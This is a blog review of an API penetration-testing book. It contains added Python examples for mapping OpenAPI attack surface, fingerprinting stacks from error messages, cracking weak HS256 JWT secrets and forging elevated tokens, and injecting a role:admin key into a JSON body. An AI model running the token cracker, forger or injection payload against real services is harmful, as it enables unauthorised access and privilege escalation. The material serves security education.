
Pentesting APIs: A Book Review for Aspiring API Hackers

Packt Publishing recently gifted me a copy of their new book, Pentesting APIs: A practical guide to discovering, fingerprinting, and exploiting APIs.

Always excited to see more resources dedicated to API security testing, I was eager to dive in. While Packt Publishing provided the book, this review and all opinions are entirely my own.

Let’s explore what this book offers to the API security community.

Getting to Know the Author

Maurício Harley was a new name to me. Based in France, he works as a Senior Software Engineer at Red Hat, specializing in OpenStack security, and is an active contributor to OWASP.

You can explore his professional background further on his Amazon author page or his LinkedIn profile.

Reviewing his previous publications, such as past articles, alongside this book, it’s clear Maurício brings practical experience to the table, offering insights grounded in real-world scenarios.

Let’s delve into his API pentesting book and see what knowledge he shares.

Content and Key Topics Explored

Let’s break down the book’s structure to understand its approach.

Spanning approximately 260 pages, the book includes numerous screenshots. These might be challenging to view in print, suggesting the Kindle or PDF versions could offer a better visual experience.

The book is divided into five distinct parts:

  1. Introduction to API Security
    1. Understanding APIs and their Security Landscape
    2. Setting up the Penetration Testing Environment
  2. API Information Gathering and AuthN/AuthZ Testing
    1. API Reconnaissance and Information Gathering
    2. Authentication and Authorization Testing
  3. API Basic Attacks
    1. Injection Attacks and Validation Testing
    2. Error Handling and Exception Testing
    3. Denial of Service and Rate-Limiting Testing
  4. API Advanced Topics
    1. Data Exposure and Sensitive Information Leakage
    2. API Abuse and Business Logic Testing
  5. API Security Best Practices
    1. Secure Coding Practices for APIs

The structure is logically progressive, starting from introductory concepts to reconnaissance, basic attacks, and advanced topics, culminating in secure coding advice.

However, the final section on secure coding practices felt somewhat disconnected. While the intention to bridge the gap between attack and defense is commendable, it seems slightly out of place in a pentesting guide. Perhaps focusing this section on effective communication of vulnerabilities to developers and remediation strategies would have been a more natural fit, aligning with the pentester’s role.

With the structure outlined, let’s move on to my overall impressions of the book.

My Honest Thoughts on the Book

It’s important to preface this by acknowledging that every security professional develops their own methodology based on their unique experiences. My perspective, shaped by my own journey in API security, may differ from Maurício’s. We often employ different tools and approaches to API penetration testing, and our definitions of what constitutes API pentesting might vary.

This isn’t to say his method is incorrect, but rather that it appeared to be somewhat incomplete from my viewpoint.

My reaction to the book was mixed. It occasionally felt rushed, with certain areas receiving superficial coverage, while others delved into excessive detail on setup processes that didn’t significantly enhance the core learning objectives.

For instance, dedicating over a dozen pages to setting up Open Bullet for credential stuffing seemed disproportionate, especially when juxtaposed with the limited attention given to crucial aspects like extracting API artifacts and OpenAPI documentation metadata for attack surface mapping.
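To show what "extracting OpenAPI documentation metadata for attack surface mapping" looks like in practice, here is an added example (my own illustration, not code from the book or its author). It walks a small OpenAPI 3 document, constructed inline for this example, and produces one record per operation, then flags operations that accept no authentication and writable operations whose body schema carries privilege-bearing fields. The field names it treats as suspicious are assumptions you would tune per target.

```python
"""Enumerate the attack surface described by an OpenAPI 3 document.

Added example (not code from the book or its author). SAMPLE_SPEC is a
constructed document; during an engagement you would load the target's
own /openapi.json, /swagger.json or /v3/api-docs instead.
"""
import json

# Constructed sample OpenAPI 3.0 document (not from any real service).
SAMPLE_SPEC = json.loads("""
{
  "openapi": "3.0.0",
  "servers": [{"url": "https://api.example.invalid/v2"}],
  "components": {
    "securitySchemes": {
      "bearerAuth": {"type": "http", "scheme": "bearer", "bearerFormat": "JWT"}
    },
    "schemas": {
      "User": {"type": "object",
               "properties": {"id": {"type": "integer"},
                              "email": {"type": "string"},
                              "is_admin": {"type": "boolean"}}}
    }
  },
  "security": [{"bearerAuth": []}],
  "paths": {
    "/users/{id}": {
      "parameters": [{"name": "id", "in": "path", "required": true,
                      "schema": {"type": "integer"}}],
      "get": {"responses": {"200": {"description": "ok"}}},
      "put": {"requestBody": {"content": {"application/json": {
                  "schema": {"$ref": "#/components/schemas/User"}}}},
              "responses": {"200": {"description": "ok"}}}
    },
    "/internal/debug": {
      "get": {"security": [],
              "parameters": [{"name": "cmd", "in": "query",
                              "schema": {"type": "string"}}],
              "responses": {"200": {"description": "ok"}}}
    }
  }
}
""")

HTTP_METHODS = {"get", "put", "post", "delete", "patch", "head", "options", "trace"}


def resolve_ref(spec, ref):
    """Follow a local '#/components/...' reference."""
    node = spec
    for part in ref.lstrip("#/").split("/"):
        node = node[part]
    return node


def body_fields(spec, op):
    """Property names of a JSON request body, following a top-level $ref."""
    content = op.get("requestBody", {}).get("content", {})
    schema = content.get("application/json", {}).get("schema")
    if schema is None:
        return []
    if "$ref" in schema:
        schema = resolve_ref(spec, schema["$ref"])
    return sorted(schema.get("properties", {}))


def map_attack_surface(spec):
    """One record per operation: method, path, parameters, body fields, auth."""
    global_security = spec.get("security", [])
    records = []
    for path, item in spec.get("paths", {}).items():
        path_params = item.get("parameters", [])
        for method, op in item.items():
            if method not in HTTP_METHODS:
                continue
            params = [f"{p['in']}:{p['name']}"
                      for p in path_params + op.get("parameters", [])]
            # A per-operation 'security' list overrides the global one;
            # an explicit empty list means the operation needs no auth.
            security = op.get("security", global_security)
            schemes = [next(iter(s)) for s in security if s]
            records.append({"method": method.upper(), "path": path,
                            "params": params, "body": body_fields(spec, op),
                            "auth": schemes or ["none"]})
    return records


def unauthenticated(records):
    """Operations reachable without any security scheme."""
    return [f"{r['method']} {r['path']}" for r in records if r["auth"] == ["none"]]


def mass_assignment_candidates(records, suspicious=("is_admin", "role", "password")):
    """Operations whose body schema exposes privilege-bearing fields (assumed names)."""
    return [f"{r['method']} {r['path']}" for r in records
            if any(f in r["body"] for f in suspicious)]


if __name__ == "__main__":
    surface = map_attack_surface(SAMPLE_SPEC)
    for r in surface:
        print(f"{r['method']:6} {r['path']:18} params={r['params']} "
              f"body={r['body']} auth={r['auth']}")
    print("unauthenticated:", unauthenticated(surface))
    print("mass-assignment candidates:", mass_assignment_candidates(surface))
```

The two checks at the end are the kind of thing you want straight out of the spec before sending a single request: an operation that opts out of the global security requirement, and a writable schema that exposes a field like `is_admin`.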

But let’s highlight the positives first. There were aspects of the book I found genuinely valuable and worth emphasizing.

Strengths of the Book

I appreciate practical techniques, and the inclusion of Google dorks for information gathering was a welcome addition. I also found his approach to identifying data structures and schemas within APIs to be insightful.

The chapter on Error Handling and Exception Testing particularly stood out. It correctly highlights a frequently overlooked area: vulnerabilities often reside within error code paths, as these are less rigorously tested than successful execution paths. While the chapter was concise, it was excellent to see this area addressed. Expanding on how to leverage failure messages to discern the underlying technology stack, as I’ve previously discussed, could have added further depth.
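As an added illustration of using failure messages to discern the technology stack (my own example, not code from the book), the script below matches a handful of header and error-body signatures against constructed sample responses. The responses imitate the default error output of a few frameworks and deliberately come from different stacks so that each signature is exercised; the signature table is illustrative, not exhaustive, and a match is a lead to confirm, not proof.

```python
"""Fingerprint a backend stack from API error responses.

Added example (not code from the book or its author). SAMPLE_RESPONSES
are constructed strings imitating default framework error output.
"""
import re

# Header-based hints: (technology, header name, pattern on its value).
HEADER_SIGNATURES = [
    ("Express/Node.js", "x-powered-by", re.compile(r"express", re.I)),
    ("ASP.NET", "x-powered-by", re.compile(r"asp\.net", re.I)),
    ("PHP", "x-powered-by", re.compile(r"php", re.I)),
    ("IIS", "server", re.compile(r"microsoft-iis", re.I)),
    ("Apache Tomcat", "server", re.compile(r"tomcat", re.I)),
]

# Body-based hints: exception and stack-trace shapes that leak when an
# unhandled exception reaches the framework's default error renderer.
BODY_SIGNATURES = [
    ("ASP.NET", re.compile(r"\bSystem\.\w+Exception\b")),
    ("Express/Node.js", re.compile(r"at \S+ \(/[^)]*?/node_modules/")),
    ("Django", re.compile(r"Traceback \(most recent call last\)|DJANGO_SETTINGS_MODULE")),
    ("Spring Boot", re.compile(r"\"exception\"\s*:\s*\"org\.springframework|Whitelabel Error Page")),
    ("PHP", re.compile(r"PHP (?:Fatal error|Warning|Notice)|\bon line \d+")),
    ("Java", re.compile(r"\bjava\.[\w.]+Exception\b")),
]


def fingerprint(headers: dict, body: str) -> set:
    """Technologies suggested by a single response (headers plus body)."""
    found = set()
    lowered = {k.lower(): v for k, v in headers.items()}
    for tech, name, pat in HEADER_SIGNATURES:
        if name in lowered and pat.search(lowered[name]):
            found.add(tech)
    for tech, pat in BODY_SIGNATURES:
        if pat.search(body):
            found.add(tech)
    return found


def fingerprint_all(responses: dict) -> dict:
    """Map each probe name to the technologies its response suggests."""
    return {name: fingerprint(h, b) for name, (h, b) in responses.items()}


# Constructed sample responses, keyed by the probe that provoked them.
SAMPLE_RESPONSES = {
    "malformed_json": (
        {"Server": "Microsoft-IIS/10.0", "X-Powered-By": "ASP.NET"},
        "System.NullReferenceException: Object reference not set to an instance "
        "of an object.\n   at Api.Controllers.UsersController.Get(Int32 id)",
    ),
    "truncated_body": (
        {"X-Powered-By": "Express"},
        "<pre>SyntaxError: Unexpected token } in JSON at position 17<br>"
        "    at JSON.parse (&lt;anonymous&gt;)<br>"
        "    at createStrictSyntaxError "
        "(/srv/app/node_modules/body-parser/lib/types/json.js:160:10)</pre>",
    ),
    "duplicate_email": (
        {"Content-Type": "application/json"},
        '{"timestamp":"2024-01-01T00:00:00Z","status":500,'
        '"error":"Internal Server Error",'
        '"exception":"org.springframework.dao.DataIntegrityViolationException",'
        '"path":"/api/users"}',
    ),
    "clean_400": (
        {"Content-Type": "application/json"},
        '{"error":"invalid request"}',
    ),
}

if __name__ == "__main__":
    for probe, techs in fingerprint_all(SAMPLE_RESPONSES).items():
        print(f"{probe:16} -> {sorted(techs) or 'no leak'}")
```

The probe names hint at the inputs that tend to reach these code paths: a body that is not valid JSON, a body cut off mid-object, and a request that violates a uniqueness constraint. A response like `clean_400` is what a well-behaved API returns; anything else in this table is a finding in its own right before you even get to the stack it reveals.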

Areas for Improvement

While the book lays a foundational structure, many sections felt like they needed more comprehensive exploration.

For example, the inclusion of Wireshark for capturing API traffic, while technically accurate, overlooks the prevalent use of TLS in modern APIs: a packet capture of an HTTPS session shows only ciphertext unless you also hold the session keys (for instance, from a client that honours SSLKEYLOGFILE). In practice you decrypt by interposing yourself as an Adversary-in-the-Middle (AITM) with an intercepting proxy whose CA certificate the client trusts. The book misses the opportunity to explain why tools like ZAP and Burp Suite are more effective for this purpose: interception and TLS termination are built in, and the captured requests can be edited and replayed rather than merely observed. The flow of information felt somewhat disjointed here.

In the section on testing API access tokens like JWTs, the depth of coverage on common attack vectors is insufficient. While it mentions the difficulty of cracking tokens for practice APIs like OWASP crAPI, this is misleading. As I demonstrated years ago, tools like HashCat, running on GPU-enabled Azure VMs, can indeed be used to recover weak HMAC signing secrets for HS256 access tokens, after which an attacker can mint tokens with whatever claims they like.
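To make the point concrete, here is an added example (my own code, not the book's) of the attack in its simplest form: a dictionary attack on an HS256 signing secret, followed by re-signing the token with an elevated claim. The token is minted here from a constructed weak secret so the script runs offline; against a real target you would paste a captured token and use a proper wordlist, or hand the token to hashcat for GPU speed. The claim names and the wordlist are illustrative.

```python
"""Recover a weak HS256 JWT signing secret by dictionary attack, then forge.

Added example (not code from the book or its author). SAMPLE_TOKEN is
minted locally from a constructed weak secret; nothing here is a real key.
"""
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def mint_hs256(claims: dict, secret: bytes) -> str:
    """Build an HS256 JWT (used to create the sample token and to forge)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"},
                               separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def claims_of(token: str) -> dict:
    """Decode the payload without verifying (what any client can read)."""
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, candidates):
    """Return the first candidate secret that reproduces the signature, else None.

    Only meaningful for HMAC-signed tokens: an RS256/ES256 token has no
    shared secret to guess, so refuse rather than burn cycles.
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token (alg={header.get('alg')})")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = b64url_decode(sig_b64)
    for secret in candidates:
        guess = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return secret
    return None


def forge(token: str, secret: str, **new_claims) -> str:
    """Re-sign the token with modified claims once the secret is known."""
    claims = claims_of(token)
    claims.update(new_claims)
    return mint_hs256(claims, secret.encode())


# Constructed sample: a token signed with a dictionary word (assumed weak key).
SAMPLE_TOKEN = mint_hs256({"sub": "42", "role": "user"}, b"password1")
WORDLIST = ["admin", "secret", "letmein", "password1", "changeme"]

if __name__ == "__main__":
    found = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    print("recovered secret:", found)
    if found:
        print("forged:", claims_of(forge(SAMPLE_TOKEN, found, role="admin")))
```

This pure-Python loop is the same computation hashcat parallelises on a GPU; the difference is throughput, not feasibility. If the secret is in any wordlist at all, a GPU rig finds it quickly, which is why the "difficult to crack" framing is misleading for tokens signed with a human-chosen string.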

The Injection Attacks and Validation Testing section represented a significant missed opportunity for deeper exploration. Consider topics I’ve covered previously, such as attacking APIs by tainting data in unconventional locations, exploiting APIs with Structured Format Injection (SFI), or compromising APIs through server-side prototype pollution. Furthermore, the book could have explored abusing API parsers to trigger logic flaws via JSON injection.
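As an added example of Structured Format Injection into a JSON body (my own illustration, not code from the book or from my earlier articles), the snippet below puts a vulnerable template next to its hardened form. The "profile" document, the field names and the attacker payload are constructed for the example; the parser behaviour it relies on, Python's `json.loads` keeping the last of two duplicate keys, is real and is the kind of parser detail a JSON injection exploits.

```python
"""Structured Format Injection (SFI) into a JSON body: vulnerable vs. hardened.

Added example (not code from the book or its author). The "profile"
document, its fields and PAYLOAD are constructed for illustration.
"""
import json


def build_profile_vulnerable(display_name: str) -> str:
    """Interpolates untrusted text straight into a JSON template.
    The attacker controls the last field, so anything appended after
    closing the string becomes a new key that the parser honours."""
    return '{"role":"user","display_name":"' + display_name + '"}'


def build_profile_hardened(display_name: str) -> str:
    """Lets the serializer quote the value; the structure cannot change."""
    return json.dumps({"role": "user", "display_name": display_name})


def effective_role(raw_json: str) -> str:
    """What a downstream service believes after parsing. json.loads keeps
    the LAST value for a duplicated key, so an injected key wins."""
    return json.loads(raw_json)["role"]


def display_name_of(raw_json: str) -> str:
    return json.loads(raw_json)["display_name"]


def duplicate_keys(raw_json: str) -> list:
    """Parser-differential check: keys that occur more than once.
    object_pairs_hook sees every pair before dict() collapses duplicates,
    so this is how a gateway can reject such bodies instead of guessing
    which backend parser will keep first or last."""
    dups = []

    def hook(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                dups.append(key)
            seen.add(key)
        return dict(pairs)

    json.loads(raw_json, object_pairs_hook=hook)
    return dups


# Constructed attacker input: closes the string, then adds a key after it.
PAYLOAD = 'Mallory","role":"admin'

if __name__ == "__main__":
    for label, builder in (("vulnerable", build_profile_vulnerable),
                           ("hardened", build_profile_hardened)):
        raw = builder(PAYLOAD)
        print(f"{label:10} {raw}")
        print(f"{'':10} role={effective_role(raw)!r} duplicates={duplicate_keys(raw)}")
```

Two things to take from it: the fix is to never assemble a structured format by string concatenation, and a receiving service that wants to be robust against whatever an upstream did should treat duplicate keys as a hard error, because which duplicate "wins" differs between JSON parsers.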

There was a consistent sense that more could have been elaborated upon throughout the book. The topics covered were relevant, but the treatment often felt somewhat shallow.

Target Audience

For someone completely new to API security testing, this book serves as a gentle introduction. It presents core fundamental knowledge essential for anyone starting in this field.

Despite the inclusion of a secure coding section, I wouldn’t recommend this book as a primary resource for developers, unless they are specifically aiming to cultivate an attacker’s perspective. Bug bounty hunters, who often possess a natural adversarial mindset, might find it more immediately applicable, as I’ve discussed previously.

Experienced API security professionals are unlikely to discover groundbreaking new information in this book. However, exposure to different methodologies and toolsets, even if familiar, can still be beneficial for broadening one’s perspective.

Final Verdict

So, is “Pentesting APIs” a worthwhile read?

I firmly believe in lifelong learning. Any knowledge gained is valuable, and continuous practice is crucial in our field.

If you are entering the world of API pentesting, you might find this book a helpful starting point on your hacking journey. Even seasoned professionals might glean a few new approaches.

However, I would still recommend exploring my curated list of essential books for every API hacker first. Books like Corey’s Hacking APIs offer a more comprehensive and in-depth coverage of the subject matter.

Hope this helps!

One More Thing…

Have you joined The API Hacker Inner Circle? It’s my FREE weekly newsletter where I share articles like this, along with exclusive pro tips, industry insights, and community news not typically shared publicly. Subscribe now at https://apihacker.blog.
